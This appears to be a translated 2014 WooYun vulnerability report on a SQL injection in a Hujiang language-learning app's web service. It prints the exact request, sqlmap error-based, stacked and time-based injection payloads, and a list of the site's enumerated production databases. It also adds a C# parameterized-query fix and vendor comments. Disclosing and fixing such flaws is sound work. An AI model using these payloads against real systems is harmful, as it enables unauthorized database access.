Vulnerability summary

Defect ID: wooyun-2014-082418

Title: A Hujiang English subsite has a SQL injection vulnerability

Related vendor: hujiang.com

Author: 路人甲

Submitted: 2014-11-10 11:37

Fix time: 2014-11-15 11:38

Published: 2014-11-15 11:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: the vendor has been notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-11-10: Details sent to the vendor; awaiting the vendor's handling
2014-11-15: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

An interface of the Hujiang Cichang (词场) app has an injection vulnerability.

Detailed description:

POST /services/mobileservice2.asmx/GetLearningBooks HTTP/1.1
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Host: cichang.hujiang.com
Connection: Keep-Alive
User-Agent: android-async-http/1.4.1 (http://loopj.com/android-async-http)
Accept-Encoding: gzip
langs=&userid=29372243


The langs parameter is injectable.

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 18:45:52
[18:45:52] [INFO] parsing HTTP request from '1.txt'
[18:45:53] [INFO] resuming back-end DBMS 'microsoft sql server'
[18:45:53] [INFO] testing connection to the target url
[18:46:14] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[18:46:14] [WARNING] if the problem persists please check that the provided target url is valid. In case that it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches (--ignore-proxy, --proxy,...)
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: langs
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: langs=' AND 2677=CONVERT(INT,(CHAR(58)+CHAR(103)+CHAR(117)+CHAR(106)+CHAR(58)+(SELECT (CASE WHEN (2677=2677) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(107)+CHAR(110)+CHAR(114)+CHAR(58))) AND 'OGab'='OGab&userid=29372243
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: langs='; WAITFOR DELAY '0:0:5'--&userid=29372243
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: langs=' WAITFOR DELAY '0:0:5'--&userid=29372243
---
[18:46:15] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
[18:46:15] [INFO] fetching database names
[18:46:36] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[18:46:38] [INFO] the SQL query used returns 22 entries
[18:46:56] [INFO] fetching number of databases
[18:46:56] [INFO] retrieved:
[18:46:56] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
[18:47:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[18:47:07] [ERROR] unable to retrieve the number of databases
[18:47:08] [INFO] retrieved: HJ_CiChang
[18:47:08] [INFO] retrieved: master
[18:47:09] [INFO] retrieved: tempdb
[18:47:09] [INFO] retrieved: model
[18:47:10] [INFO] retrieved: msdb
[18:47:11] [INFO] retrieved: HJ_YuLiao_Ti
[18:47:12] [INFO] retrieved: HJ_Cognos
[18:47:13] [INFO] retrieved: HJ_ClassAnaly
[18:47:14] [INFO] retrieved: HJ_ClassApp
[18:47:15] [INFO] retrieved: HJ_Yuliao
[18:47:15] [INFO] retrieved: HJ_CiChang
[18:47:16] [INFO] retrieved: HJ_Exam
[18:47:20] [INFO] retrieved: HJ_A6
[18:47:21] [INFO] retrieved: HJ_A6Report
[18:47:22] [INFO] retrieved: HJ_Pay
[18:47:22] [INFO] retrieved: DBCenter
[18:47:23] [INFO] retrieved: HJ_Analysis
[18:47:23] [INFO] retrieved: HJ_WordTest
[18:47:24] [INFO] retrieved: HJ_History
[18:47:24] [INFO] retrieved: HJ_HuTi
[18:47:24] [INFO] retrieved: HJ_WordTest2
[18:47:24] [INFO] retrieved: HJ_CiChangBI
[18:47:25] [INFO] retrieved: distribution
[18:47:25] [INFO] retrieved:
available databases [23]:
[*] DBCenter
[*] distribution
[*] HJ_A6
[*] HJ_A6Report
[*] HJ_Analysis
[*] HJ_CiChang
[*] HJ_CiChangBI
[*] HJ_ClassAnaly
[*] HJ_ClassApp
[*] HJ_Cognos
[*] HJ_Exam
[*] HJ_History
[*] HJ_HuTi
[*] HJ_Pay
[*] HJ_WordTest
[*] HJ_WordTest2
[*] HJ_Yuliao
[*] HJ_YuLiao_Ti
[*] master
[*] model
[*] msdb
[*] tempdb
[18:47:25] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 25 times
[18:47:25] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\cichang.hujiang.com'
[*] shutting down at 18:47:25

There are quite a few databases; my abilities are limited, so I'll stop here.

Proof of vulnerability:

[*] DBCenter
[*] distribution
[*] HJ_A6
[*] HJ_A6Report
[*] HJ_Analysis
[*] HJ_CiChang
[*] HJ_CiChangBI
[*] HJ_ClassAnaly
[*] HJ_ClassApp
[*] HJ_Cognos
[*] HJ_Exam
[*] HJ_History
[*] HJ_HuTi
[*] HJ_Pay
[*] HJ_WordTest
[*] HJ_WordTest2
[*] HJ_Yuliao
[*] HJ_YuLiao_Ti
[*] master
[*] model
[*] msdb
[*] tempdb

Suggested fix:
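
The report leaves the fix section empty. As an added illustration that is not part of the original report or of the vendor's code, the following C# sketch contrasts the string-splicing pattern that makes an ASMX method like GetLearningBooks injectable with a parameterized version; the table and column names (LearningBooks, Title, Lang, UserId), the connection string and the comma-separated format of langs are assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;
using System.Web.Services;

public class MobileService2 : WebService
{
    // Placeholder: a real service reads this from configuration.
    private const string ConnectionString = "<CONNECTION-STRING-PLACEHOLDER>";
    // Reconstructed illustration of the vulnerable pattern (not the vendor's code): splicing
    // langs/userid into the SQL text is what lets "'; WAITFOR DELAY '0:0:5'--" execute.
    private static string UnsafeQuery(string langs, string userid)
    {
        return "SELECT Title FROM LearningBooks WHERE Lang IN ('" + langs +
               "') AND UserId = " + userid;
    }
    // Hardened version: the query text is fixed and every user value is bound.
    [WebMethod]
    public List<string> GetLearningBooks(string langs, string userid)
    {
        int uid;
        if (!int.TryParse(userid, out uid))
            throw new ArgumentException("userid must be an integer");
        var codes = (langs ?? "").Split(new[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
        var titles = new List<string>();
        using (var conn = new SqlConnection(ConnectionString))
        using (var cmd = conn.CreateCommand())
        {
            // One parameter per language code: a quote or semicolon inside a
            // code is data that matches nothing, never SQL syntax.
            var placeholders = new List<string>();
            for (int i = 0; i < codes.Length; i++)
            {
                string name = "@lang" + i;
                placeholders.Add(name);
                cmd.Parameters.Add(name, SqlDbType.NVarChar, 16).Value = codes[i].Trim();
            }
            // Empty langs (as in the captured request) matches no rows instead of yielding invalid SQL.
            string inList = placeholders.Count > 0 ? string.Join(",", placeholders) : "NULL";
            cmd.CommandText = "SELECT Title FROM LearningBooks WHERE UserId = @uid AND Lang IN (" + inList + ")";
            cmd.Parameters.Add("@uid", SqlDbType.Int).Value = uid;
            conn.Open();
            using (var reader = cmd.ExecuteReader())
                while (reader.Read()) titles.Add(reader.GetString(0));
        }
        return titles;
    }
}
```

The error-based payload in the report relies on the database error text reaching the client, so the service should also return a generic error on exceptions rather than the raw SQL Server message.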

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2014-11-15 11:38

Vendor reply:

Latest status:

2014-11-24: It's all my fault... I didn't confirm it in time... My boss has already sternly criticized me in the toilet (the location seems a bit odd?)... To express our thanks, we are sending a gift; we hope the white hat will kindly accept it.


Vulnerability rating:

Comments

  1. 2014-11-15 12:37 | 默之 (Regular white hat | Rank: 334, vulnerabilities: 67 | Settling down.)

    @沪江英语, no impact?

  2. 2014-11-24 13:11 | 上海互加文化传播有限公司 (WooYun vendor)

    @默之 There is an impact... I've already admitted fault above, please go easy on me... We're contacting WooYun to send the white hat a small gift.

  3. 2014-11-24 13:12 | 默之 (Regular white hat | Rank: 334, vulnerabilities: 67 | Settling down.)

    @上海互加文化传播有限公司 I've already sent you a private message. I've never received a gift before; just thinking about it makes me happy.

  4. 2014-11-24 13:15 | 默之 (Regular white hat | Rank: 334, vulnerabilities: 67 | Settling down.)

    @上海互加文化传播有限公司 Also, does this subsite have internal interface calls? http://cichang.hujiang.com/services/mobileservice2.asmx